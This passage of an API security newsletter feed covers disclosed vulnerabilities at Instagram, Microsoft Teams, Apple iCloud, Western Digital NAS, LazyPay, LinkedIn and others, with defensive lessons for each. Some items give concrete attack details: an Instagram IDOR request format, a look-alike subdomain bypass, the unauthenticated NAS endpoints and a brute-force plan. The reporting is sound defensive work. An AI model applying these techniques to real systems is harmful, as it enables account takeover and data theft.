<p>So you might assume that a policy like the one shown below (screenshot from the old AWS documentation) only gives access to a <code>test</code> environment:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8254 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/07/AWS_vulnerable_IAM_policy_for_test_stage.png" alt="" width="1600" height="878" /></p>
<p>But in reality, any of the following resources would be a match as well, thus giving the API caller access they should not have:</p>
<ul>
<li><code>arn:aws:execute-api:us-west-1:12345678:<strong>myApiId</strong>/test/<strong>GET/foo/bar/</strong></code></li>
<li><code>arn:aws:execute-api:us-west-1:12345678:<strong>myApiId/myStage/GET/foo/bar</strong>/test/hello/world</code></li>
<li><code>arn:aws:execute-api:us-west-1:12345678:<strong>myApiId/myStage/GET/foo/bar</strong>/test/</code></li>
<li><code>arn:aws:execute-api:us-west-1:12345678:<strong>myApiId/myStage/GET</strong>/test/<strong>hello/world</strong></code></li>
</ul>
<p>(Bold font used to indicate the substrings that matched the <code>*</code>s around /test/ in the policy.)</p>
<p>Read the original research for more examples of how the use of wildcards can go wrong with Lambda authorizers in AWS.</p>
<p>Quoting the research for recommendations:</p>
<blockquote>
<ol>
<li><em>Review the use of stars in the <code>policyDocument</code> object. The rule of thumb is that if a star is used at all at the last part of the ARN, it should be in the form of a &#8220;<code>/*</code>&#8221; at the very end of the resource string (i.e.: &#8220;arn:aws:execute-api:us-west-1:12345678:myApiId/test/GET/foo/bar/*&#8221;). You can obtain the API ID, stage name and HTTP method dynamically from the input provided to the lambda authorizer. Create one resource string in the policy for each allowed HTTP method.</em></li>
<li><em>Consider adding Deny statements that help limit the impact or scope of star expansions on the <code>policyDocument</code>. Remember that AWS IAM always gives precedence to Deny over Allow if multiple statements match an operation.</em></li>
<li><em>Whenever feasible, use defense in depth and check again that the user is authorized to call an endpoint in the lambda that implements it. Don&#8217;t rely on the lambda authorizer policy as your only method of authorization unless you are sure you can do it securely.</em></li>
<li><em>Make sure any code imported from the previous version of the lambda authorizer blueprints is updated to the latest version.</em></li>
<li><em>If you use URL path parameters in your APIs, avoid cases where the valid values expected to be submitted to them can be chosen by potential attackers. Prefer backend-generated IDs instead of user-chosen names for entities, for example.</em></li>
</ol>
</blockquote>
<h2>Standards: AsyncAPI</h2>
<p>AsyncAPI is an open standard, similar to OpenAPI but for asynchronous APIs. These are useful when the API client wants to be called back when a certain event happens.</p>
<p>AsyncAPI Initiative just released version 2.1.0 of the specification as well as the enabling tools. The changes in the new version include:</p>
<ul>
<li>Expanded message examples</li>
<li>Mercure and IBM MQ protocol bindings</li>
<li>SASL security schemes</li>
<li>Updated official AsyncAPI tools.</li>
</ul>
<p>For more details, see <a href="https://www.asyncapi.com/blog/release-notes-2.1.0" target="_blank" rel="noopener noreferrer">release notes by Lukasz Gornicki</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-141-api-vulnerabilities-veryfitpro-gettr-aws-lambda-authorizers-update-asyncapi/">Issue 141: API vulnerabilities in VeryFitPro and Gettr, AWS Lambda authorizers, AsyncAPI 2.1</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 140: API vulnerabilities at LazyPay, Western Digital, and LinkedIn; IDOR mindmap</title>
		<link>https://apisecurity.io/issue-140-api-vulnerabilities-lazypay-western-digital-linkedin-idor-mindmap/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 30 Jun 2021 22:00:37 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8229</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at LazyPay, API attacks on Western Digital My Book Live NAS systems, and LinkedIn profiles getting scraped. We also have a new detailed mind map for broken object-level authorization (BOLA/IDOR) vulnerabilities. Vulnerability: LazyPay LazyPay is a pay-later platform that has over 2 million [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-140-api-vulnerabilities-lazypay-western-digital-linkedin-idor-mindmap/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-140-api-vulnerabilities-lazypay-western-digital-linkedin-idor-mindmap/">Issue 140: API vulnerabilities at LazyPay, Western Digital, and LinkedIn; IDOR mindmap</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities reported at LazyPay, API attacks on Western Digital My Book Live NAS systems, and LinkedIn profiles getting scraped. We also have a new detailed mind map for broken object-level authorization (BOLA/IDOR) vulnerabilities.</p>
<h2>Vulnerability: LazyPay</h2>
<p>LazyPay is a pay-later platform that has over 2 million active users in India.</p>
<p>Security researcher Ehraz Ahmed found that <a href="https://gadgets.ndtv.com/internet/news/lazypay-security-flaw-vulnerability-fix-payu-2465220" target="_blank" rel="noopener noreferrer">the API behind LazyPay&#8217;s mobile app was vulnerable</a>. The story behind the link claims that this was an API for 3rd-party developers, but in a private chat with APIsecurity.io, Ahmed said that the journalist got it wrong and the API was in fact directly powering the mobile app.</p>
<p>LazyPay had an endpoint that had no authentication. Attackers could call the endpoint and supply a phone number to obtain sensitive personal information on the user in question, such as profile picture, name, gender, date of birth, postal address,  primary and secondary email addresses, secondary mobile number, know your customer (KYC) status (verified or not), and account creation date.</p>
<p>Keep in mind that there is a limited number of phone numbers in India. Thus, attackers could write a script to easily iterate through all possible phone numbers and retrieve the data for all users.</p>
<p>Once Ahmed alerted PayU — the parent company behind LazyPay — to the vulnerability, they promptly fixed the issue. According to them, there was no evidence of it being exploited.</p>
<p>Lessons learned here:</p>
<ul>
<li>Even APIs that your own applications and their components use need authentication and authorization. Do not underestimate attackers&#8217; determination and skill in finding and evoking any unprotected API endpoint.</li>
<li>Avoid predictable identifiers, like sequential IDs or phone numbers, to make it harder to scrape your data.</li>
</ul>
<h2>Vulnerability: Western Digital My Book Live NAS</h2>
<p>There have been multiple reports over the last week of attackers going after internet-connected Western Digital My Book Live NAS (Network-Attached Storage) systems and remotely wiping them, killing all customer data. There have also been some additional reports on the devices getting taken under a botnet control instead of wiping them clean.</p>
<p>The initial reports assumed that the attack was based on the vulnerability CVE-2018-18472 <a href="https://www.wizcase.com/blog/hack-2018/" target="_blank" rel="noopener noreferrer">reported by WizCase back in 2018</a>  that Western Digital did not fix because the affected devices are no longer officially supported.</p>
<p>The vulnerability boiled down to unauthenticated remote command execution through a <code>PUT</code> request to the endpoint <code>/api/1.0/rest/language_configuration</code>. This endpoint accepted XML configurations but did not properly validate the XML. External entities were allowed and attackers could use them to force the NAS to download and execute scripts from an attacker server:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8231 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/censys_diagram_on_WD_NAS_RCE.png" alt="" width="1260" height="708" /></p>
<p><a href="https://censys.io/blog/cve-2018-18472-western-digital-my-book-live-mass-exploitation/" target="_blank" rel="noopener noreferrer">Researchers at Censys looked at the later reports and logs on the exploit</a> and found that besides the original vulnerability, at least some of the attacks used a <code>POST</code> request to the REST API endpoint  <code>system_factory_restore</code> to wipe out the devices.</p>
<p>That endpoint didn&#8217;t require any authentication either. In fact, the researchers managed to get access to the code of the most recent (from 2015) software from the NAS and discovered that authentication check on that endpoint was <em>intentionally</em> commented out by developers:</p>
<pre class="line-numbers"><code class="language-http">function post($urlPath, $queryParams=null, $ouputFormat=’xml’){
    //        if(!authenticateAsOwner($queryParams))
    //        {
    //            header(“HTTP/1.0 401 Unauthorized”);
    //            return;
    //        }

    parse_str(file_get_contents(“php://input”), $changes);

    ...</code></pre>
<p>One can only speculate why this happened.</p>
<p>Since there is no patch available, Western Digital is urging all owners of the affected device to immediately disconnect it from the internet.</p>
<p>Lessons learned with this one:</p>
<ul>
<li>Authentication is the key: your APIs should be protected, no matter what. There are precious few cases where having no authentication is acceptable (login, password reset, etc.) and they need to be handled with great care to prevent abuse.</li>
<li>Never trust API consumer inputs! Strictly define and enforce schemas for all API payloads.</li>
<li>Test your API implementations to make sure those conform to the API contracts and do so automatically on every update! This way, if, say, your developers disable authentication to make their dev testing easier (or for some other reason), your tests catch that and prevent the insecure code from hitting production. For example, this is what <a href="https://42crunch.com/api-conformance-scan/" target="_blank" rel="noopener noreferrer">42Crunch API Conformance Scan</a> does.</li>
</ul>
<h2>API scraping: LinkedIn</h2>
<p>Over the last few months, there have been several reports on scraped LinkedIn data. The latest one on this week was <a href="https://restoreprivacy.com/linkedin-data-leak-700-million-users/" target="_blank" rel="noopener noreferrer">a set of 700 million profiles</a>  — that&#8217;s 92% of the total LinkedIn user base!</p>
<p>(There are different opinions in the community as to whether the data in this particular set is new or is a compilation of earlier sets such as the 500 million profiles set leaked in April.)</p>
<p>The sellers confirmed that they obtained the data through LinkedIn APIs. The details in the data set include:</p>
<ul>
<li>Full names</li>
<li>Physical addresses</li>
<li>Email addresses</li>
<li>Phone numbers</li>
<li>Geolocation records</li>
<li>LinkedIn username and profile URL</li>
<li>Other social media accounts and usernames</li>
<li>Personal and professional experience/background</li>
<li>Gender</li>
</ul>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8232 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/LinkedIn-Data-Breach-700-million-users-exposed-2021-leak.png" alt="" width="1014" height="554" /></p>
<p>Just like with the Facebook profile data leak <a href="https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/" target="_blank" rel="noopener noreferrer">that we reported in issue 129</a>, even if the data is public, these large data sets scraped through APIs often amplify the power of the data and fuel phishing campaigns and other nefarious activities.</p>
<p>Thus, bulk user data scraping through APIs is a big problem and a risk that needs to be taken into account and addressed. Sadly, this seems to continue to be downplayed by many vendors arguing that it&#8217;s not a breach if legitimate APIs (as opposed to an infrastructure compromise) were used. In reality, the impact can be just as devastating.</p>
<p>Repeating the lessons learned that we posted previously:</p>
<ul>
<li>APIs are one of your primary attack surfaces. Treat them as such!</li>
<li>Even public information can become dangerous once it becomes available as a large dataset. Information is power, after all: more information, more power. It should not be allowed to fall into wrong hands through negligence.</li>
<li>APIs should not give access to more data than you are comfortable with (and allowed to!) sharing through user interfaces.</li>
<li>Bulk operations are extremely dangerous. Always limit not just the rates at which APIs can be invoked and the amount of data that they can return.</li>
<li>APIs need to be secured <em>by design</em>. Fixing issues only after they have been exploited can be disastrously late.</li>
<li>Monitoring, alerting, and <em>promptly reacting to</em> vulnerability reports are good additional mitigation measures.</li>
</ul>
<h2>Pentesting: IDOR mind map</h2>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">BOLA, also known as IDOR</a> holds the number one spot among API vulnerabilities on the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10 list</a>. The vulnerability happens when APIs are allowed to access resources owned by one user when they have authenticated as another user that is not supposed to have access to the resources.</p>
<p>Mufaddal Masalawala has created a mind map that summarizes 19 methods that penetration testers can employ to find BOLA vulnerabilities:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8230 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/IDOR-Mindmap.jpg" alt="" width="2670" height="1450" /></p>
<p>For more details, see also:</p>
<ul>
<li><a href="https://www.xmind.net/m/CSKSWZ/" target="_blank" rel="noopener noreferrer">Online version of the mind map</a></li>
<li><a href="https://github.com/muffyhub/Mindmaps/blob/main/IDOR%20Techniques.png" target="_blank" rel="noopener noreferrer">High definition image</a></li>
<li><a href="https://notes.mufaddal.info/web/idor" target="_blank" rel="noopener noreferrer">Quick textual explanation of each entry</a></li>
</ul>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-140-api-vulnerabilities-lazypay-western-digital-linkedin-idor-mindmap/">Issue 140: API vulnerabilities at LazyPay, Western Digital, and LinkedIn; IDOR mindmap</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 139: API vulnerabilities at Apple, Amazon, and 1Sambayan, upcoming Gartner webinar</title>
		<link>https://apisecurity.io/issue-139-api-vulnerabilities-apple-amazon-1sambayan-upcoming-gartner-webinar/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 23 Jun 2021 22:00:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8207</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities at Apple, Amazon, and the volunteer coordination app of the Philippine opposition coalition, and there is an upcoming API security webinar by Gartner. Vulnerability: Apple iCloud account takeover Laxman Muthiyah was able to demonstrate how he could brute-force his way into taking over someone [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-139-api-vulnerabilities-apple-amazon-1sambayan-upcoming-gartner-webinar/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-139-api-vulnerabilities-apple-amazon-1sambayan-upcoming-gartner-webinar/">Issue 139: API vulnerabilities at Apple, Amazon, and 1Sambayan, upcoming Gartner webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities at Apple, Amazon, and the volunteer coordination app of the Philippine opposition coalition, and there is an upcoming API security webinar by Gartner.</p>
<h2>Vulnerability: Apple iCloud account takeover</h2>
<p>Laxman Muthiyah was able to demonstrate how <a href="https://thezerohack.com/apple-vulnerability-bug-bounty" target="_blank" rel="noopener noreferrer">he could brute-force his way into taking over someone else&#8217;s Apple iCloud account</a> by exploiting the password reset API endpoint.</p>
<p>Apple&#8217;s Forgot Password function allows you to change your password by sending a 6-digit verification code to your registered phone number and email address. Muthiyah found that indeed Apple has some protection against attacks in place. For example, after 5 unsuccessful attempts the account was locked for a few hours:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8209 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/apple_icloud_password_reset_code_rate_limit.jpg" alt="" width="800" height="385" /></p>
<p>Since attackers likely won&#8217;t have access to the user&#8217;s phone and inbox, Muthiyah checked if he could programmatically try all the possible combinations (1 million combinations for a 6-digit code) and do that without the account being locked. This would require invoking the API from scripts, possibly from multiple machines at the same time so the system does not have time to lock the account:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8210 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/password_reset_api_call.jpg" alt="" width="800" height="419" /></p>
<p>It turned out that the rate-limiting of that API was in fact a generic rate-limit across the whole API, not just dedicated to the password reset. Muthiyah could send 6 concurrent <code>POST</code> requests from a single IP address, and he found 6 separate API instances on the Apple side that he could invoke. This meant that he could make 6*6=36 tests from a single virtual machine. To go through all 1 million combinations, he would need less than 28 000 machines.</p>
<p>For that, attackers would need a cloud service that would allow them to spin up multiple machines. Muthiyah found that Apple was blocking calls from popular cloud services, like AWS and Google Cloud Platform, but some less known ones worked for him.</p>
<p>Do read the original story to see how this case unfolded, as well as the Muthiyah&#8217;s back and forth with Apple on the disclosure.</p>
<p>Lessons learned here:</p>
<ul>
<li>API operations related to login and password reset are more sensitive than the rest of your API. When defining rate limits consider the usage scenario and have the limits on these sensitive operations at the level that prevents the abuse.</li>
</ul>
<p>We have previously covered Muthiyah&#8217;s work on similar vulnerabilities at Instagram and Microsoft in our issues <a href="https://apisecurity.io/issue-40-instagram-7-eleven-zipato/" target="_blank" rel="noopener noreferrer">40</a> and <a href="https://apisecurity.io/issue-124-api-vulnerabilities-microsoft-truecaller-guardians-pentester-labs-api-security-ford-motors/" target="_blank" rel="noopener noreferrer">124</a>.</p>
<h2>Vulnerability: Amazon Delivery Location API</h2>
<p>If you are an Amazon customer and use their mobile app, you have probably seen that it can show the approximate location of your delivery once the driver is less than 10 stops away.</p>
<p>Jan Masters from Pen Testing Partners found that <a href="https://www.pentestpartners.com/security-blog/tracking-amazon-delivery-staff/" target="_blank" rel="noopener noreferrer">the API behind this feature discloses a lot more information than the application using the API</a>:</p>
<ul>
<li>He could start calling the API right when the courier dispatched (so a lot more than 10 stops were remaining).</li>
<li>The geolocation coordinates were extremely precise, so he could see, for example, where within the buildings the courier would go.</li>
</ul>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8223 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/Amazon_delivery_tracking_API_response.jpg" alt="" width="400" height="546" /></p>
<p>This raises both privacy and physical concerns, for both the couriers and the recipients of deliveries.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8224 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/Amazon_delivery_precise_location.jpg" alt="" width="500" height="413" /></p>
<p>Lessons learned:</p>
<ul>
<li>Treat your APIs as your interface and make sure that the APIs do not disclose more information than the users are supposed to get.</li>
</ul>
<h2>Vulnerability: 1Sambayan</h2>
<p>APIs behind the volunteer app of the Philippines&#8217; opposition coalition 1Sambayan <a href="https://mb.com.ph/2021/06/12/one-big-vulnerability-in-1sambayan-app/" target="_blank" rel="noopener noreferrer">was found to be leaking highly sensitive personal information</a> (PII).</p>
<p>The API was vulnerable to <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA/IDOR)</a> as well as <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">Excessive Data Exposure</a>. The API had an operation to retrieve user profile using the user ID. And boy, did this call return a lot: name, physical address, phone number, date of birth, Apple/Google/Facebook ID, password (!), profile picture, username, and profession.</p>
<p>To make things worse, profile IDs in the app were sequential, making it trivial to script their enumeration and retrieve all user records.</p>
<p>Needless to say, this is a huge privacy — and in many cases, personal safety — risk.</p>
<p>Lessons learned with this one:</p>
<ul>
<li>Define, review, and enforce your API outputs. Chances are that a lot of the data that you store actually needs not be available through your apps and APIs.</li>
<li>Reduce the risk of data exposure by collecting and storing only as little personal data as you really need.</li>
<li>Prevent account enumeration by implementing long random identifiers (such as GUIDs) rather than sequential IDs.</li>
<li>Implement authorization checks to make sure that users cannot access records belonging to someone else.</li>
</ul>
<h2>Webinar: Gartner on API security</h2>
<p>Mark O&#8217;Neill and Dionisio Zumerle are leading Gartner analysts on APIs and API security, and we have quoted their research multiple times in our newsletter.</p>
<p>Gartner&#8217;s materials are usually only available for purchase or to their corporate clients. However, next month Gartner will be hosting a webinar on API security, by O&#8217;Neill and Zumerle, available to anyone (free registration is still required):</p>
<p><a href="https://www.gartner.com/en/webinars/4002323/api-security-protect-your-apis-from-attacks-and-data-breaches" target="_blank" rel="noopener noreferrer"><strong>API Security: Protect your APIs from Attacks and Data Breaches</strong></a><br />
July 15, 2021 8:00 a.m. PDT</p>
<p>Discussion Topics:</p>
<ul>
<li>Tools and techniques that can protect your APIs from attacks</li>
<li>Best techniques to protect mobile applications that use APIs</li>
<li>Ways to ensure the API your teams build are secure</li>
</ul>
<p>Abstract:</p>
<blockquote><p><em>Gartner predicts that by 2022, application programming interface (API) attacks will become the most-frequent attack vector, causing data breaches for enterprise web applications. Already, many well-publicized API security vulnerabilities affected a wide range of organizations. This complimentary webinar explores the attack paths for APIs and how your team can protect against them by building secure APIs. You will learn how API discovery and API security testing help strengthen this initiative.</em></p></blockquote>
<p>Not an opportunity that comes often, so make sure to reserve your spot.</p>
<p>The post <a href="https://apisecurity.io/issue-139-api-vulnerabilities-apple-amazon-1sambayan-upcoming-gartner-webinar/">Issue 139: API vulnerabilities at Apple, Amazon, and 1Sambayan, upcoming Gartner webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 138: Vulnerabilities in Microsoft Teams and Instagram</title>
		<link>https://apisecurity.io/issue-138-vulnerabilities-microsoft-teams-instagram/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Jun 2021 22:00:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8178</guid>

					<description><![CDATA[<p>This week, we check out the recent vulnerabilities in Microsoft Teams and Instagram, the awesome-apisecurity repo in GitHub, and the upcoming DevSecCon24 conference. Vulnerability: Microsoft Teams Evan Grant found a way to break into Microsoft Teams accounts by leveraging Microsoft Power Apps. Microsoft Power Apps and Power Automate services are meant to provide easy tools [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-138-vulnerabilities-microsoft-teams-instagram/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-138-vulnerabilities-microsoft-teams-instagram/">Issue 138: Vulnerabilities in Microsoft Teams and Instagram</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent vulnerabilities in Microsoft Teams and Instagram, the <code>awesome-apisecurity</code> repo in GitHub, and the upcoming DevSecCon24 conference.</p>
<h2>Vulnerability: Microsoft Teams</h2>
<p>Evan Grant found <a href="https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138" target="_blank" rel="noopener noreferrer">a way to break into Microsoft Teams accounts by leveraging Microsoft Power Apps</a>.</p>
<p>Microsoft Power Apps and Power Automate services are meant to provide easy tools to add custom applications and flows to Teams. A small bug in Power Apps snowballed into a big issue, allowing attackers to create a Teams tab, steal the victim&#8217;s tokens through a rogue <code>iFrame</code>, and then use that token to gain persistent read/write access to the victim’s email, Teams chats, OneDrive, Sharepoint, and a variety of other services.</p>
<p>Here&#8217;s a quick video on Grant&#8217;s proof of concept for gaining access to another user&#8217;s OneDrive file:</p>
<p><iframe loading="lazy" title="Stealing OneDrive files in Microsoft Teams" width="640" height="360" src="https://www.youtube.com/embed/Jrovk5Mo6Qo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The Teams tabs were checking the location of iFrames and ensuring that those began with <code>https:<em>//</em>make<em>.</em>powerapps<em>.</em>com</code>. However, Grant could circumvent this by simply creating a subdomain that starts with that string but is hosted on his own domain, like <code>https:<em>//</em>make<em>.</em>powerapps<em>.</em>com<em>.</em>fakecorp<em>.</em>ca/</code>. This allowed him to get his custom code to run on a Teams tab and get access to the victim&#8217;s tokens.</p>
<p>He could then use the <code>https:<em>//</em>apps<em>.</em>powerapps<em>.</em>com/auth/onbehalfof</code> endpoint to silently exchange the tokens into tokens from other systems, such as:</p>
<ul>
<li style="list-style-type: none;">
<ul>
<li><code>apihub<em>.</em>azure<em>.</em>com</code></li>
<li><code>graph<em>.</em>microsoft<em>.</em>com</code></li>
<li><code>service<em>.</em>flow<em>.</em>microsoft<em>.</em>com</code></li>
<li><code>service<em>.</em>powerapps<em>.</em>com</code></li>
<li>Dynamics apps subdomains</li>
</ul>
</li>
</ul>
<p>Grant then used these tokens to access private data. For example, he could use the service flow token to create a Power Automate flow to access the Outlook mails, Teams messages, and OneDrive and SharePoint files of another user. The whole process looked like this:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8179 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/Microsoft_Teams_vulnerability_flow.png" alt="" width="1056" height="768" /></p>
<p>Grant&#8217;s write-up is fascinating (do read it for more details) and shows how trivial-looking things here and there can turn into a serious exploit opportunity. Luckily, Microsoft has since fixed the issue.</p>
<p>Lessons learned here:</p>
<ul>
<li>Perform strict data validation on any URLs, parameters, and payloads.</li>
<li>Adhere to the zero trust approach. Every API must assume that other application components have been compromised instead of blindly trusting them.</li>
<li>Ask for explicit user approvals on the first token use and token exchange.</li>
</ul>
<h2>Vulnerability: Instagram</h2>
<p>Facebook continues to patch broken object-level authorization (<a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">BOLA, aka IDOR</a>) in their GraphQL APIs. This time, they paid the $30,000 prize to Mayur Fartade for finding <a href="https://fartademayur.medium.com/this-is-how-i-was-able-to-see-private-archived-posts-stories-of-users-on-instagram-without-de70ca39165c" target="_blank" rel="noopener noreferrer">a bug that allowed a malicious user to view targeted media on Instagram</a>.</p>
<p>Attackers could get access to details of private and archived Instagram posts, stories, Reels, or IGTV of other users if they knew the media ID of the resource.</p>
<p>Here are the steps that he followed:</p>
<ol>
<li>Obtain the media ID of the target post, Reel, IGTV, or story, either by brute-forcing or by other means.</li>
<li>Send a <code>POST</code> request with  the following parameters to the endpoint <code>https:<em>//</em>i<em>.</em>instagram<em>.</em>com/api/v1/ads/graphql/</code><br />
Parameters:<br />
<code>doc_id=[REDACTED]&amp;query_params={"query_params":{"access_token":"","id":"[MEDIA_ID]"}}</code><br />
<code>[MEDIA_ID]</code> is the media id of the post/reel/IGTV/story, <code>doc_id</code> is redacted from the example.</li>
<li>The API returns <code>display_url</code>, <code>save_count</code>, and other details of the media, even if the resource is not supposed to be accessible or had already been archived.</li>
</ol>
<p><img loading="lazy" decoding="async" src="https://miro.medium.com/max/1406/0*27JjvMOFSnJGmH0q.png" sizes="auto, 700px" srcset="https://miro.medium.com/max/552/0*27JjvMOFSnJGmH0q.png 276w, https://miro.medium.com/max/1104/0*27JjvMOFSnJGmH0q.png 552w, https://miro.medium.com/max/1280/0*27JjvMOFSnJGmH0q.png 640w, https://miro.medium.com/max/1400/0*27JjvMOFSnJGmH0q.png 700w" alt="" width="703" height="650" /></p>
<p>Fartade also found another endpoint with similar behavior. Instagram has since fixed the issue.</p>
<p>Lessons learned:</p>
<ul>
<li>Authentication is not enough. Make sure that any resource access also enforces authorization checks to ensure that <em>only</em> users who are supposed to have access to the resource can access it.</li>
</ul>
<h2>Resources: awesome-apisec</h2>
<p>GitHub has plenty of repositories that collect links to useful resources on a certain topic handily accessible in one place.</p>
<p>One such GitHub repository is <a href="https://github.com/arainho/awesome-api-security" target="_blank" rel="noopener noreferrer">awesome-apisec</a> by André Rainho. This repository pulls together a collection of API security resources, such as tools, cheat sheets, checklists, labs, videos, and so on.</p>
<p>Worth checking out and bookmarking it for future reference.</p>
<h2>Conferences: DevSecCon24</h2>
<p>DevSecCon24 is another industry event gone all online this year and thus available wherever you are.</p>
<p>There&#8217;s a lot of DevSecOps content at the event and at least one session specifically on API security, &#8220;<strong>It&#8217;s Time for API Security as Code!</strong>&#8221; by Isabelle Mauny on Thursday Jun 24, 10:35 AM &#8211; 11:15 AM GMT +1.</p>
<p>You can read the abstract and register for free <a href="https://events.bizzabo.com/308842/agenda/speakers/1185116" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-138-vulnerabilities-microsoft-teams-instagram/">Issue 138: Vulnerabilities in Microsoft Teams and Instagram</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 137: Vulnerabilities in VMware vCenter and Apache Pulsar, GraphQL and CSRF attacks</title>
		<link>https://apisecurity.io/issue-137-vulnerabilities-vmware-vcenter-apache-pulsar-graphql-csrf-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Jun 2021 22:00:48 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8144</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in VMware vCenter and Apache Pulsar, how GraphQL implementations may be vulnerable to cross-site request forgery (CSRF) attacks, an upcoming webinar on API Security and Postman, a DZone webinar with this newsletter&#8217;s author next week, and a video on  how the API security vendor [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-137-vulnerabilities-vmware-vcenter-apache-pulsar-graphql-csrf-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-137-vulnerabilities-vmware-vcenter-apache-pulsar-graphql-csrf-attacks/">Issue 137: Vulnerabilities in VMware vCenter and Apache Pulsar, GraphQL and CSRF attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities in VMware vCenter and Apache Pulsar, how GraphQL implementations may be vulnerable to cross-site request forgery (CSRF) attacks, an upcoming webinar on API Security and Postman, a DZone webinar with this newsletter&#8217;s author next week, and a video on  how the API security vendor landscape looks like.</p>
<h2>Vulnerability: VMware vCenter</h2>
<p>A recently patched <a href="https://arstechnica.com/gadgets/2021/06/under-exploit-vmware-vulnerability-with-severity-rating-of-9-8-out-of-10/" target="_blank" rel="noopener noreferrer">vulnerability in VMware vCenter is now being actively exploited</a>.</p>
<p>The vulnerability in question, CVE-2021-21985, is a critical one: it has a severity level of 9.8 out of 10 and it allows remote code execution (RCE). As mentioned, VMware has already released a patch, but attackers are now actively going after unpatched instances of vCenter.</p>
<p>The root cause lies in the lack of validation of JSON payloads in API calls. Attackers have found a sequence of 6 <code>POST</code> calls where the JSON payloads allow them to take control over the system. All they need is accessing the vCenter system over the network (<code>HTTPS</code>, so port <code>443</code>.)</p>
<p>The proof of concept code for the exploit is — unfortunately — also publicly available, flying this vulnerability off the criticality charts.</p>
<p>If you are a vCenter customer, make sure this vulnerability is patched as quickly as possible. If you are an API provider, make sure you have strict data validation on all JSON payloads.</p>
